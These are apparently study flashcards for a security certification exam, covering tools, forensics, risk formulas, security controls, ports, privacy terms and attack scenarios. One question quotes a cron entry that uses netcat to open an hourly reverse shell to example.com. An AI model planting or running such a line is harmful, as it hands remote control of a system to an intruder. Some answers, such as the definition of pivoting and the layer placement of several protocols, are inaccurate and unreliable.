• Reverse ARP (RARP) request “Who has this MAC address?”
• RARP reply “I have that MAC address; my IP address is…”
What is harvester used for?
assist penetration testers
useful tool for exploring what is publicly available about your organization on the
Web

What is DNSenum used for?

DNS enumeration can be used to collect information such as user names and IP
addresses of targeted systems

What is Nessus used for?

Nessus is one of the leading vulnerability scanners in the marketplace. It comes
in a free version, with limited IP address capability, and fully functional
commercial versions

How use chmod in Linux?

chmod <options> <permissions> <filename>

Octal notation for chmod

4 stands for “read,” 2 stands for “write,” 1 stands for “execute,” and 0 stands for
“no permission.”

What is PowerShell?
PowerShell is a powerful command-line scripting interface. PowerShell files use
the .ps1 file extension.

What is OpenSSL used for?

OpenSSL can perform the following tasks in either scripts or programs, offering
access to cryptographic functions without having to develop the code:
• Work with RSA and ECDSA keys
• Create certificate signing requests (CSRs)
• Verify CSRs
• Create certificates
• Generate self-signed certificates
• Convert between encoding formats (PEM, DER) and container formats
(PKCS12, PKCS7)
• Check certificate revocation status

What is PCAP file?

recorded traffic in the form of packet capture

Difference between dd and FKT Imager

dd is a Linux command-line utility used to convert and copy files, whereas FTK
Imager is a commercial program designed to capture an image of a hard drive

What is data sanitization?

Data sanitization tools are tools used to destroy, purge, or otherwise identify for
destruction specific types of data on systems.

You need to analyze previously collected packet

data on a network, including editing some of
the data. Which is the best tool to use?
TCPreplay
6 steps in incident response process

What is tabletop exercise

Walk through all the steps of a process, ensuring all elements are covered and
that the plan does not forget a key dataset or person.

This is typically a fairly high-level review

Should be repeated after major changes to systems

What is walkthrough exercise?

One party either explains or demonstrates the steps to perform a task while a
second person observes
What is MITRE ATT&CK framework?
The MITRE ATT&CK framework is a knowledgebase of various real-world
observations and attack techniques. It is often used by organizations for threat
modeling.

What is cyber kill chain?

Developed by Lockheed Martin, the Cyber Kill Chain is a framework used to
defend against the chain of events an attacker takes, from the beginning of an
attack to the end of an attack.

Difference between DRP and BCP?

Disaster recovery plan
Business continuity plan

The focus of the BCP is on continued operation of a business, albeit at a reduced

level or through different means during some period of time. The DRP is focused
specifically on recovering from a disaster. In many cases, both of these functions
happen at the same time, and hence they are frequently combined in small firms
and in many discussions. The DRP is part of the larger BCP process.

What is the difference between COOP and BCP?

Business continuity plan
Continuity of operation planning

The COOP is focused on continuing business operation, whereas the BCP is

focused on returning a business to functioning profitably, even if at a reduced
level or capacity. Government agencies, where service is essential and costs can
be dealt with later, focus on COOP, while many businesses have to focus on DRP
and BCP.

Cyber kill chain model parts

Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command and Control
Action on Objective

What provides security log?

Information regarding the success and failure of attempted logins as well as
security-related audit events.

When can be dump file created?

by several utilities
by OS when system crashes

What is Session initiation protoco?

Text-based protocol used for signaling voice, video, and messaging applications
over IP

SIP provides information for initiating, maintaining, and terminating real-time

sessions.

What is Syslog/Rsyslog/Syslog-ng used for?

Syslog, rsyslog, and syslog-ng all move data into log files on a log server. Rsyslog
and syslog-ng both extend the original syslog standard by adding capabilities
such as content filtering, log enrichment, and correlation of data elements into
higher-level events.

What is the difference between jorunalctl and

syslog?
Journalctl is the command to examine logs on a server. Syslog (and the variants
rsyslog and syslog-ng) is used to move logs to a log server and sometimes to
manipulate the log file entries in transit.
What is EXIF format?
(EXIF) format is a standard that defines the formats of image, audio, and
metadata tags used by cameras, phones, and other digital recording devices

Includes:
• The original filename
• Capture and last edited date and timestamps (with varying precision)
• GPS location coordinates (degrees of latitude and longitude)
• A small thumbnail of the original image
• The author’s name and copyright details
• Compass heading
• Device information, including manufacturer and model
• Capture information, including lens type, focal range, aperture, shutter speed,
and flash settings

Difference between NetFlow and sFlow?

Both NetFlow and sFlow collect packets from routers and switches. NetFlow data
can be useful in intrusion investigations. sFlow is used primarily for traffic
management, although it will help with DDoS attacks.

What is IPFIX?
primary purpose of IPFIX is to provide a central monitoring station with
information about the state of the network

proprietary Cisco NetFlow standard

What correlation in SIEM means?

Correlation allows different events to be combined to provide greater specificity
in determining SIEM-based event detection. Correlation is a means for a SIEM
system to apply rules to combine data sources to fine-tune event detection.

What is primary goal for DLP?

DLP can be classified as a technical control. Its primary goal is to detect
breaches and prevent data loss.
What are enclaves?
Enclaves is the most commonly used term to describe sections of a network that
are logically isolated by segmentation at the networking protocol.

Difference between runbook and playbook in

XSOAR?
A runbook typically focuses on technical aspects of computer systems or
networks. A playbook is more comprehensive and has more of a people/general
business focus.

You have been directed by upper management

to block employees from accessing Facebook
from the corporate machines. Which would be
the easiest way to exercise this control?
Content filtering

What is chain of custody?

After evidence is collected, it must be properly controlled to prevent tampering.
The chain of custody accounts for all persons who handled or had access to the
evidence. More specifically, the chain of custody shows who obtained the
evidence, when and where it was obtained, where it was stored, and who had
control or possession of the evidence for the entire time since the evidence was
obtained

What is time offset?

time offset is the difference in time between the system clock and the actual
time.

What are tags used for?

Tags refer to a specific piece of hardware evidence
What is acquisition?
Acquisition refers to the collection of information that may be evidence in an
investigation.

Order of volatility
Order of how to collect data before it's lost

1. CPU, cache, and register contents (collect first)

2. Routing tables, ARP cache, process tables, kernel statistics
3. Live network connections and data flows
4. Memory (RAM)
5. Temporary file system/swap space
6. Data on hard disk
7. Remotely logged data
8. Data stored on archival media/backups (collect last)

What is common data element needed later in

the forensics process?
Accurate system time with respect to an accurate external time source

A record time offset is calculated by measuring system time with an external

clock such as a Network Time Protocol (NTP) server. The offset between system
time and true time can be lost if the system is powered down, so it is best to
collect it while the system is still running.
Disk

What is Swap/Pagefile?
The swap or pagefile is a structure on a system’s disk to provide temporary
storage for memory needs that exceed a system’s RAM capacity

What are artifacts?

Artifacts are the principal data element used in forensics. They are connected to
how the computer manages data to perform a task.
What is disadvantage of checksums?
A disadvantage is that they miss larger numbers of errors as a second error can
cancel the effect of the first on a checksum. Thus, checksums serve no real
purpose in digital forensics. If two checksums are different, the incoming data
streams are different. If the checksums are the same, you might still have
different data streams.

What is provenance?
Provenance is a reference to the origin of data. In the case of digital forensics, it
is not enough to present a specific data element as “proof”; one must also show
where it came from.

How can we implement preservation in

forensic?
chain of custody is maintained until the case is completed and the materials are
released or destroyed

forensic copy of the data is obtained, a hash is collected as well, to allow for the
verification of integrity.

What is sufficient evidence?

Sufficient evidence states the evidence must be convincing or measure up
without question

What is direct evidence?

Direct evidence is oral testimony that proves a specific fact (such as an
eyewitness’s statement).

What is knowledge of the fact evidence?

The knowledge of the facts is obtained through the five senses of the witness,
with no inferences or presumptions.
What is competent evidence?
Competent evidence states the evidence must be legally qualified and reliable

What is relevent evidence?

Relevant evidence states the evidence must be material to the case or have a
bearing on the matter at hand.

What is real evidence?

Real evidence is also known as associative or physical evidence and includes
tangible objects that prove or disprove a fact.

What is physical evidence?

Physical evidence links the suspect to the scene of a crime.

What is documentary evidence?

Evidence in the form of business records, printouts, manuals, and similar objects,
which make up much of the evidence relating to computer crimes, is
documentary evidence.

What are managerial controls?

Managerial controls are those that are based on overall risk management. These
security controls focus on the management of risk or the management of the
cybersecurity system. The use of cybersecurity audits is an example of a
managerial control
What is operational control?
An operational control is a policy or procedure used to limit security risk. These
security controls are primarily implemented and executed by people, as opposed
to systems. Instructions to guards are an example of an operational control

What is technical control?

A technical control uses some form of technology to address a physical security
issue. These security controls are primarily implemented and executed by the
information system through mechanisms contained in its hardware, software, or
firmware components. Biometrics is an example of a technical control.
What is the difference between operational and
technical control?
The main difference between operational and technical controls is that
operational controls are those that people initiate and follow, whereas technical
controls are typically automated and involve a machine to execute.

What is preventive control?

A preventative control is one that prevents specific actions from occurring, such
as a mantrap prevents tailgating. Preventative controls act before an event,
preventing it from advancing. A firewall is an example of a preventative control,
as it can block access to a specific resource.

What is detective control?

A detective control is one that facilitates the detection of a physical security
breach. Detective controls act during an event, alerting operators to specific
conditions. Alarms are common examples of detective controls. An IDS is an
example of an IT security alarm that detects intrusions.

What is corrective control?

A corrective control is used after an event, in an effort to minimize the extent of
damage. Load balancers and redundant systems act to reduce the risk from
system overloading and are thus corrective controls. Backups are a prime
example of a corrective control, as they can facilitate rapid resumption of
operations.
What is detterent control?
A deterrent control acts to discourage the attacker by reducing the likelihood of
success from the perspective of the attacker. Any control that increases the cost
to an attacker is a deterrent control. An example would be laws and regulations
that increase punishment, increasing risk and costs for the attacker. Another
example would be the use of salts for password hashes to increase the cost of
building rainbow tables.

What is compensating control?

A compensating control is one that is used to meet a requirement when there is
no control available to directly address the threat. Fire suppression systems do
not prevent fire damage, but if properly employed, they can mitigate or limit the
level of damage from fire.

What is physical control?

Physical controls prevent specific human interaction with a system and are
primarily designed to prevent accidental operation of something. Physical
controls act before an event, preventing it from actually occurring.

What are different control categories and types

Categories are managerial, operational, and technical.

Types are preventative, detective, corrective, deterrent, compensating, and

physical.

Which type of security control is used after the

event, in an effort to minimize the extent of
damage?
Corrective
The use of a penetration test to determine
vulnerabilities is an example of what category
of control?
Managerial

The use of combination locks as a security

control procedure to limit physical security risk
is an example of what category of control?
Operational

What is SSAE SOC 2 report and types?

SSAE SOC 2 reports focus on internal controls related to compliance or
operations.

A SOC Type I report evaluates whether proper controls are in place at a specific
point in time.
A SOC Type II report is done over a period of time to verify operational efficiency
and effectiveness of the controls.

What is EA?
The Enterprise Architecture (EA) is a broad framework describing all aspects

What is CCM?
Cloud Controls Matrix (CCM) is a list of security controls for the cloud, mapped to
leading standards, best practices, and regulations.

What is CIS?
Organizations often refer to Center for Internet Security (CIS) benchmarks to
develop secure configuration postures.
What is DoD DISA STIGs program?
Comprehensive, proscriptive configuration guides for all major operating systems
are available here.

Which ISO standard covers risk management

activities
31000

Where would one look for consensus-

developed, secure configuration guidelines for
hardening a wide range of technical items?
CIS

What is AUP?
Acceptable use policy (AUP) outlines what the organization considers to be the
appropriate use of its resources, such as computer systems, e-mail, Internet, and
networks. Organizations should be concerned about any personal use of
organizational assets that does not benefit the company.

Acceptable use policy outlines what is considered acceptable behavior for a

computer system’s users. This policy often goes hand-in-hand with an
organization’s Internet usage policy

What is seperation of duties?

No single individual has the ability to conduct transactions alone

Spreads responsibilities out over an organization so no single individual becomes

the indispensable individual with all of the “keys to the kingdom” or unique
knowledge about how to make everything work.
What is principle of least privileges?
The principle of least privilege states that users should only have a level of
access permissions required to perform their job.

What is NDA?
Nondisclosure agreements are legally binding documents. Signed NDAs are often
required by employers during the onboarding process to ensure employees are
aware of privacy and confidentiality concerning company data.

What includes onboarding policy?

nboarding policy should include provisions for the handling of data, the disposal
of data, acceptable use, and any sanctions that may occur as a result of misuse.

What is gamification?
Gamification is the use of games to facilitate user training.

What is role-based training?

While all employees may need general security awareness training, they also
need specific role-based awareness training in areas where they have individual
responsibilitie

What is MOU?
A memorandum of understanding (MOU) and memorandum of agreement (MOA)
are legal documents used to describe a bilateral agreement between parties to
some common pursuit or goal.

generally lack the binding powers of a contract.

What is MSA?
Measurement systems analysis (MSA) is a field of study that examines
measurement systems for accuracy and precision. Before an enterprise relies on
measurement systems, it is important to understand whether the chosen
measurement system is acceptable for its intended use, to understand the
different sources of variation present in it and to identify and understand sources
of bias, errors, and factors associated with repeatability and reproducibility.

What is BPA?
A business partnership agreement (BPA) is a legal agreement between partners
that establishes the terms, conditions, and expectations of the relationship
between the partners.

These details can cover a wide range of issues, including typical items such as
the sharing of profits and losses, the responsibilities of each partner, the addition
or removal of partners, and any other issues

Difference between End of Life (EOL) End of

Service Life (EOSL)?
End of service life (EOSL) or end of support is when the manufacturer quits
selling an item. In most cases, the manufacturer no longer provides maintenance
services or updates.

What is data governance?

Data governance is the process of managing the availability, usability, integrity,
and security of the data in enterprise systems. This must be done by policy, as it
involves a large number of data owners and users.

Difference between change management and

change control?
Change management is about the process of applying change. Change control is
about the details of the change itself.
What is asset management?
Asset management is the policies and processes used to manage the elements
of the system, including hardware, software, and the data that is contained
within them.

What is legacy systems threat?

Legacy systems are older, pre-existing systems. True issue behind what makes a
system a legacy system is the concept of technical debt. Technical debt is the
cost occurred over time as a result of not maintaining a system completely.

What can be multiparty risk?

financing for the project is from another firm, and subcontractors are involved,
other party determinations of acceptable risk levels become an issue very
quickly

Different types of risk - 6 what can be risk?

external, internal, legacy systems, multiparty, IP theft, and software compliance/
licensing.

What is risk management?

Decision-making process
Risk management strategies include elements of threat assessment, risk
assessment, and security implementation concepts, all positioned within the
concept of business management.

What are four things you can do to respond to

risk?
accept it
transfer it
avoid it
mitigate it
What is acceptence when it comes to risk?
For example, a manager may choose to allow a programmer to make
“emergency” changes to a production system (in violation of good separation of
duties) because the system cannot go down during a given period of time.

What is avoidence when it comes to risk?

Not deploying a module that increases risk is one manner of risk avoidance.

What is transference when it comes to risk?

Transference of risk is when the risk in a situation is covered by another entity

Cloud computing, contracts and legal agreements will denote which parties are
assuming which risks.

What is mitigation when it comes to risk?

Risk can also be mitigated through the application of controls that reduce the
impact of an attack. Controls can alert operators so that the level of exposure is
reduced through process intervention.

What is risk register?

A risk register is a list of the risks associated with a system.

What is risk matrix/heat map?

A risk matrix or heat map is used to visually display the results of a qualitative
risk analysis

Use the numbers 1 to 5 for each of the axes, and this yields risk values from 1 to
25.
What is Risk Control Assessment?
A risk control assessment is a tool used by the Financial Industry Regulatory
Authority (FINRA) to assess a series of risks associated with their member
institutions

What is Risk Control Self-Assessment?

Risk control self-assessment is a technique that employs management and staff
of all levels to identify and evaluate risks and associated controls

What is control risk?

Control risk is when the risk specifically affects the financial reporting.

What is Sarbanes-Oxley Act of 2002?

protects investors from corporate fraud and bad financial reporting

Difference between quantitative and qualitative

risk
Quantitative means you can actually count something, whereas qualitative is
more subjective, with values such as high, medium, and low.

What can be impact when threat exploits a

vulnerability?
Loss of life
Company-owned property damage
Safety - injury
Finance
Reputation
What is asset value? (AV)
The asset value (AV) is the amount of money it would take to replace an asset.

What is SLE?
Single-Loss Expectancy (SLE)
SLE = asset value (AV) × exposure factor (EF)

For example, to calculate the exposure factor, assume the asset value of a small
office building and its contents is $2 million. Also assume that this building
houses the call center for a business, and the complete loss of the center would
take away about half of the capability of the company.

$2 million × 0.5 = $1 million

What is ALE?
Annualized Loss Expectancy annual loss expectancy (ALE) is calculated by
multiplying the SLE by the likelihood or number of times the event is expected to
occur in a year, which is called the annualized rate of occurrence (ARO):

ALE = SLE × ARO

What is ARO?
The annualized rate of occurrence (ARO) is a representation of the frequency of
the event, measured in a standard year. If the event is expected to occur once in
20 years, then the ARO is 1/20.

The ALE determines a threshold for evaluating the cost/benefit ratio of a given
countermeasure. Therefore, a countermeasure to protect this business
adequately should cost no more than the calculated ALE

What is RTO?
The term recovery time objective (RTO) is used to describe the target time that is
set for the resumption of operations after an incident.
Shorter RTO results in higher costs because it requires greater coordination and
resources.

What is RPO?
Recovery point objective (RPO) is the time period representing the maximum
period of acceptable data loss.

RPO defines the frequency of backup operations necessary to prevent

unacceptable levels of data loss.

Difference between RTO and RPO?

The RTO serves the purpose of defining the requirements for business continuity,
while the RPO deals with backup frequency.

What is MTTR and how to calculate?

Mean time to repair (MTTR) is a common measure of how long it takes to repair a
given failure.

MTTR = (total downtime) / (number of breakdowns)

What is availability and how do you calculate

it?
Availability is a measure of the amount of time a system performs its intended
function.

Availability = MTBF / (MTBF + MTTR)

MTBF = Mean Time Between Failures

Assuming a system has an MTBF of 6 months and the repair takes 30 minutes,
the availability would be the following:

Availability = 6 months / (6 months + 30 minutes) = 99.9884%

What is MTBF?
Mean time between failures is a common measure of reliability of a system and
is an expression of the average time between system failures.

The time between failures is measured from the time a system returns to service
until the next failure. The MTBF is an arithmetic mean of a set of system failures:

MTBF = ∑ (start of downtime – start of uptime) / number of failures

Name often used to describe the process of

addressing the questions associated with
sources of risk, their impacts, and the steps
taken to mitigate them in the enterprise?
Business impact analysis

What is private data?

The term private data is usually associated with personal data belonging to a
person and less often with corporate entities. (Passwords)

What is confidential data?

Data is labeled confidential if its disclosure to an unauthorized party would
potentially cause serious harm to the organization.

What is consider critical data?

Data is labeled critical if its disclosure to an unauthorized party would potentially
cause extreme harm to the organization.

Common examples of critical data include trade secrets, proprietary software

code, and new product designs, as the release of these could result in significant
loss to the firm
What is proprietary data?
Proprietary data is data that is restricted to a company because of potential
competitive use.

What is PII?
Personally identifiable information

PII refers to information that can be used to distinguish or trace an individual’s

identity, either alone or when combined with other personal or identifying
information that is linked or linkable to a specific individual.

What is PHI?
Protected health information

PHI is any information that is created or received by a health care provider,

health plan, public health authority, employer, life insurer, school or university,
or health care clearinghouse and relates to the past, present, or future physical
or mental health or condition of an individual; the provision of health care to an
individual; or the past, present, or future payment for the provision of health
care to an individual.

What is anonymization when it comes to data?

Data anonymization is the process of protecting private or sensitive information
by removing identifiers that connect the stored data to an individual.

Separating the PII elements such as names, Social Security numbers, and
addresses from the remaining data through a data anonymization process
retains the usefulness of the data but keeps the connection to the source
anonymous.

What is pseudo-anonymization when it comes

to data?
Replaces private identifiers with fake identifiers or pseudonyms (for example,
replacing the value of the name identifier “Mark Sands” with “John Doe”).
Pseudonymization preserves statistical accuracy and data integrity, allowing the
modified data to be used for training, development, testing, and analytics while
protecting data privacy.

What is data controller responsible for?

What data is collected
Where and how it is used
With whom and how data is shared
How long the data is kept and how it is disposed at the end of life

What is data processor responsible for?

Developing and implementing IT processes and systems that manage personal
data
Implementing security measures that would safeguard personal data
Using tools and strategires to properly handle personal data

Who is data privacy officer?

The data privacy officer (DPO) is the C-level executive who is responsible for
establishing and enforcing data privacy policy and addressing legal and
compliance issues.

What is privacy impact assessment?

Structured approach to determining the gap between desired privacy
performance and actual privacy performance

Organizations that collect, use, store, or process personal information are

required to conduct a privacy impact assessment.

Difference between privacy policy and privacy

notice?
Privacy policy is internally focused, telling employees what they may do with
personal information, whereas a privacy notice is externally facing, telling
customers, regulators, and other stakeholders what the organization does with
personal information.

What is privacy?
One’s ability to control information about oneself

Who is responsible for determining what data is

needed by the enterprise?
Data owner

What is the term for notifying customers of

your privacy policy and its effect on their
information?
Privacy notice

What protocols are used in application layer?

HTTP(s), SNMP, SMTP, FTP(s), Telnet, SSH, DNS

What protocols are used in presentation layer?

SSL, TLS, IMAP, SSH

What protocols are used in session layer?

NetBios, RTP, PPTP

What is presentation layer responsible for?

Data compression, character set translation, and encryption are found in this
layer.
What is session layer responsible for?
The primary responsibility of the session layer is the managing of communication
sessions between machines. The management functions include initiating,
maintaining, and terminating sessions.

What port uses FTP?

20 for data, 21 for control

What port is used by SSH?

22

What port is used by Telnet?

23

What port is used by SMTP?

25

What port is used by HTTP?

80

What port is used by HTTPS?

443

What port is used by POP3?

110
What port is used by NetBios?
137, 138, 139

What port is used by IMAP?

143

What port is used by SNMP?

161

What port is used by encrypted SMTP?

465

What port is used by LDAPS?

636

What port is used by FTPS?

990

What port is used by Secure IMAP?

993

What port is used by Secure POP3?

995
What port is used by RDP?
Remote desktop protocol 3389

What is swapfile?
A swapfile is a location on a hard disk drive used as the virtual memory
extension of computer's RAM

Where to find evidence of SQL injection attacks

against Apache web server on a Debian server?
access.log

The company that Gary works for has identified

the need to run separate systems for credit
card processing and general office use.
Unfortunately, the organization does not have
space or funds to put secondary systems in
place and so instead opts to use dedicated
credit card processing devices. What type of
control is this?
The control that Gary has implemented is specifically designed to compensate
for a control that is too expensive to implement. This is an example of a
compensating control. A preventive control attempts to stop a risk from
happening, a managerial control is often a process or a policy, and a deterrent
control discourages risk actors from taking action.

Which factor is the best indicator of an

encryption key’s strength once you know the
encryption algorithm in use?
The key length
What are 3 components of CI/CD environment?
Visibility
Feedback
Continues deployment

Tom has been asked to implement a solution

that will help his organization apply least
privilege principles to local administrative
accounts as well as to Windows domain
accounts. What type of solution should he look
for?
Privileged access management, or PAM, focuses on the enhanced capabilities
that accounts like administrator and power user accounts have. A PAM tool will
help Tom to manage and maintain those accounts and their rights. None of the
other answers are correct. A discretionary access control (DAC) system is used to
allow users to delegate rights to resources they control or own. SSO is single
sign-on, and Challenge Handshake Authentication Protocol (CHAP) is an
authentication protocol.

Tom logs into his Google account to access

services on a photo-editing site. What role is
Google playing in this scenario?
IdP - identity provider.

What is VIP?
Virtual IP

What command can add text to the end of file?

netcat, head, tail, cat?
cat
What is the difference between MAC and DAC?
Mandatory access control (MAC) is a type of access control that enforces
authorization rules by the operating system. Users cannot override
authentication or access control policies. Discretionary access control (DAC) does
not have centralized control of authorization, and users can override
authentication and access control policies.

Mikayla believes that the system she is

reviewing may have fallen victim to a DLL
injection attack. What type of malware is she
most likely to find?
Memory resident malware

Henry wants to conduct a risk assessment for

his organization and needs to calculate the
exposure factor (EF) for a system. What type of
assessment should be conduct?
quantitative

What is CASB?
Cloud application security broker

What would prevent a user from installing a

program on a company-owned mobile device?
Allow list

How is MTBF calculated?

Mean time between failures (MTBF) is calculated by dividing the number of
operational hours (its uptime) by the number of failures during that time period.
What is default port for LDAP?
389

Which of the following is not a type of log that

will be captured using journald, and thus made
available via journalctl?
Web server messages continue to be logged to a specific web server log file, but
system and journald captures messages produced by initrd, the kernel, and
services as well as other components of a Linux system.

What is the downside of voice recognition

systems?
systems require training

Derek wants to access a filesystem on machine

that has experienced an operating system
failure that prevents it from booting. What
nonpersistent option will allow him to boot the
system without the operating system working?
Live boot media is designed to allow an operating system to be started without
having a copy on the system’s disk drive. Live boot tools are nonpersistent and
are often used for forensic recovery, system repair, and remediation, and to
safely run a system that can then be purged by simply shutting it down.
Reverting to a known good state or a last-known good checkpoint work with the
existing OS, and a reinstallation will not meet the conditions expressed in the
scenario.

What is pivoting?
Pivoting involves the rescanning of network connections to find unknown or
previously unseen connections.
How does a hypervisor enable multiple guest
operating systems to run concurrently on a
host computer?
By abstracting the hardware from the guest operating system

When a program is installed and needs

permissions, what is this called?
Provisioning

When you’re designing and tweaking biometric

systems, the point where both the accept and
reject error rates are equal is known as which
of the following?
The crossover error rate

Which backup strategy includes only the files

and software that have changed since the last
full backup?
Differential backup

Alarms are effective only if?

They are tuned to provide accurate and useful alerts.

What is confidentiality?
Information has not been disclosed to unauthorized people

What is integrity?
Information has not been modified or altered without proper
authorization
What can be physical control?
Alarm systems, locks, surveillance cameras, identification cards, and
security guards

What can be technical control?

Smart cards, encryption, access control lists (ACLs), intrusion detection
systems, and network authentication

Diffrence between polymorphic and

metamorphic virus?
Polymorphic
• Advanced version of an encrypted virus that changes itself every time
it is executed by altering the decryption module to avoid detection

Metamorphic
• Virus that is able to rewrite itself entirely before it attempts to infect
a file (advanced version of polymorphic virus)

What is often used by rootkits?

DLL injection is commonly used by rootkits to maintain their persistent
control

What can be used by an attacker to maintain

persisten access?
RAT - Remote Access Trojan

What is dropper?
Malware designed to install or run other types of malware embedded in a
payload
on an infected host
What is downloader?
A piece of code that connects to the Internet to retrieve additional tools after the

initial infection by a dropper

What is living of the land?

Exploit techniques that use standard system tools and packages to perform
intrusions
Detection of an adversary is more difficult when they are executing malware
code
within standard tools and processes

What is anomaly-based detection?

Analyzes the current traffic against an established baseline and
triggers an alert if outside the statistical average

Types of alerts? (False, positive)

§ True positive
• Malicious activity is identified as an attack
§ False positive
• Legitimate activity is identified as an attack
§ True negative
• Legitimate activity is identified as legitimate traffic
§ False negative
• Malicious activity is identified as legitimate traffic

What is HIDS and what is it used for?

Host-based IDS
HIDS logs are used to recreate the events after an attack has occurred
What are the most commonly used encryption
softwares for hard drives?
FileVault
BitLocker

What is TPM?
Trusted Platform Module (TPM)
Chip residing on the motherboard that contains an encryption key
If your motherboard doesn’t have TPM, you can use an external
USB drive as a key

What is HSM?
Hardware Security Module (HSM)
Physical devices that act as a secure cryptoprocessor during the encryption
process

What is UEBA?
User and Entity Behavior Analytics (UEBA)

§ A system that can provide automated identification of suspicious activity by

user
accounts and computer hosts
§ UEBA solutions are heavily dependent on advanced computing techniques like
artificial intelligence (AI) and machine learning

Hardening mobile devices steps

o 1. Update your device to the latest version of the software
o 2. Install AntiVirus
o 3. Train users on proper security and use of the device
o 4. Only install apps from the official mobile stores
o 5. Do not root or jailbreak your devices
o 6. Only use v2 SIM cards with your devices
o 7. Turn off all unnecessary features
o 8. Turn on encryption for voice and data
o 9. Use strong passwords or biometrics
o 10. Don’t allow BYOD
o Ensure your organization has a good security policy for mobile devices

What is applciation whitelist?

Only applications that are on the list are allowed to be run by the
operating system while all other applications are blocked

What is application blacklist?

Any application placed on the list will be prevented from running while all others
will be permitted to run

Which file extension should be used in Linux?

ext4

What is due diligence?

A legal principle identifying a subject has used best practice or reasonable
care when setting up, configuring, and maintaining a system

What is ROT?
Hardware Root of Trust (ROT)

o A cryptographic module embedded within a computer system that can endorse

trusted execution and attest to boot settings and metrics

o A hardware root of trust is used to scan the boot metrics and OS files to verify
their
signatures, which we can then use to sign a digital report
What is atomic execution?
Certain operations that should only be performed once or not at all, such as
initializing a memory location

What set of algorithms is designed for low-

power devices such as the Internet of Things
and embedded systems?
Lightweight

What is the most secure means of establishing

connectivity to a Wi-Fi access point?
SAE protocol

Three modes that are supported by bluetooth

4.0
Classic, High Speed, and Low Energy.

What is UEM?
(unified endpoint management) solutions can address a wider range of devices

What is IdP?
Identity provider

Difference between data anonymization and

pseduo anonymization?
Data anonymization protects sensitive data by removing identifiers that connect
the stored data to the individual
Pseudonymization preserves statistical accuracy and data integrity, for example,
replacing the value of the name identifier “Mark Sands” with “John Doe”

What is IPFIX used for?

Capturing which machines are in communication with each other

Which type of evidence is also known as

associative or physical evidence and includes
tangible objects that prove or disprove a fact?
Real evidence

John has discovered that an attacker is trying

to get network passwords by using software
that attempts a number of passwords from a
list of common passwords. What type of attack
is this?
Dictionary attacks use a list of words that are believed to be likely passwords. A
rainbow table is a precomputed table of hashes. Brute force tries every possible
random combination. If attacker has the original plain text and ciphertext for a
message, they can determine the key space used through brute-force attempts
targeting the key space. Session hijacking is when the attacker takes over an
authenticated session.

Valerie is responsible for security testing

applications in her company. She has
discovered that a web application, under
certain conditions, can generate a memory
leak. What type of attack would this leave the
application vulnerable to?
A denial-of-service (DoS) attack may target a memory leak. If an attacker can
induce the web application to generate the memory leak, then eventually the
web application will consume all memory on the web server and the web server
will crash. Backdoors are not caused by memory leaks. SQL injection places
malformed SQL into text boxes. A buffer overflow attempts to put more data in a
variable than it can hold.

What two files are commonly attacked using

offline brute-force attacks?
The Windows Security Account Manager (SAM) file and the /etc/shadow file for
Linux systems both contain passwords and are popular targets for offline brute-
force attacks.

A penetration tester calls a staff member for

her target organization and introduces herself
as a member of the IT support team. She asks if
the staff member has encountered a problem
with their system, then proceeds to ask for
details about the individual, claiming she needs
to verify that she is talking to the right person.
What type of social engineering attack is this?
Pretexting is a type of social engineering that involves using a false motive and
lying to obtain information. Here, the penetration tester as lied about their role
and why they are calling (impersonation), and then built some trust with the user
before asking for personal information. A watering hole attack leverages a
websites that the targeted users all use and places malware on it to achieve
their purpose. Prepending is described by CompTIA as “adding an expression or
a phrase,” and shoulder surfing involves looking over an individual’s shoulder or
otherwise observing them entering sensitive information like passwords.

Why is SSL stripping a particular danger with

open Wi-Fi networks?
Open hotspots do not assert their identity in a secure way.

Since open Wi-Fi hotspots do not have a way to prove they are legitimate, they
can be easily spoofed. Attackers can stand up a fake version of the hotspot and
then conduct an SSL stripping attack by inserting themselves into sessions that
victims attempt to open to secure servers.
Mary has discovered that a web application
used by her company does not always handle
multithreading properly, particularly when
multiple threads access the same variable. This
could allow an attacker who discovered this
vulnerability to exploit it and crash the server.
What type of error has Mary discovered?
race condition

Ryan needs to verify that no unnecessary ports

and services are available on his systems, but
he cannot run a vulnerability scanner. What is
his best option?
Configuration reviews, either using automated tool or manual validation, can be
a useful proactive way to ensure that unnecessary ports and services are not
accessible. Configuration management tools can also help ensure that expected
configurations are in place. Neither passive nor active network packet capture
will show services that are not accessed, meaning that open ports could be
missed, and log review won’t show all open ports either.

Amanda encounters a Bash script that runs the following

crontab -e 0 * * * * nc example.com 8989 -e /bin/bash

This command starts a reverse shell connecting to example.com on port 8989

every hour. If you’re not familiar with cron, you should take a moment to read
the basics of cron commands and what you can do with them—you can read a
man page for cron at manpages.ubuntu.com/manpages/focal/man8/cron.8.html .

What is consensus?
Consensus, sometimes called social proof, is a social engineering principle that
leverages the fact that people are often willing to trust groups of other people.
Acme Company is using smartcards that use
near-field communication (NFC) rather than
needing to be swiped. This is meant to make
physical access to secure areas more secure.
What vulnerability might this also create?
Eavesdropping

Chris wants to detect a potential insider threat

using his security information and event
management (SIEM) system. What capability
best matches his needs?
User behavior analysis is a key capability when attempting to detect potential
insider threats. Chris can use his SIEM’s behavioral analysis capabilities to detect
improper or illicit use of rights and privileges as well as abnormal behavior on
the part of his users.

Spyware is an example of what type of

malware?
PUP

Which raid level is using distributed parity bits?

RAID level 5 is disk striping with distributed parity

What provides RAID 1 type?

Mirroring

What provides RAID 3?

disk striping with dedicated parity
Which level of RAID is a “stripe of mirrors”?
1+0

Elizabeth wants to implement a cloud-based

authorization system. Which of the following
protocols is she most likely to use for that
purpose?
OAuth is common authorization service used for cloud services. It allows users to
decide which websites or applications to entrust their information to without
requiring them to give them the user’s password.

Isabella is responsible for database

management and security. She is attempting to
remove redundancy in the database. What is
this process called?
Normalization

What is disadvantage of tape-based backup?

They take longer to restore

What is included in blockchain's public ledger?

Blockchain public ledgers contain an identity for participants (although the
identity may be semi-anonymous), the transaction record, and the balance or
other data that the blockchain is used to store.

Different types of fire supression systems

Inert gas systems - reduce the oxygen in a room without the hazard
Dry-pie, pre-charge - systems use water
Carbon dioxide - could be harmful to people
What is the most secure physical lock?
Deadbolt

Different types of physical locks

Deadbolt - the most secure
Padlock
Key-in-knob
Combination lock

What is the shortcut for anything as a service?

XaaS

Different types of embedded systems

An Arduino is a microcontroller well suited for custom development of embedded
systems. They are small, inexpensive, and commonly available.

Raspberry Pi - small computer, bigger risk of compromise.

A custom field-programmable gate array (FPGA) will typically be more complex

and expensive than an Arduino,

Repurposed desktop PC - introduces all the potential issues that a PC can include
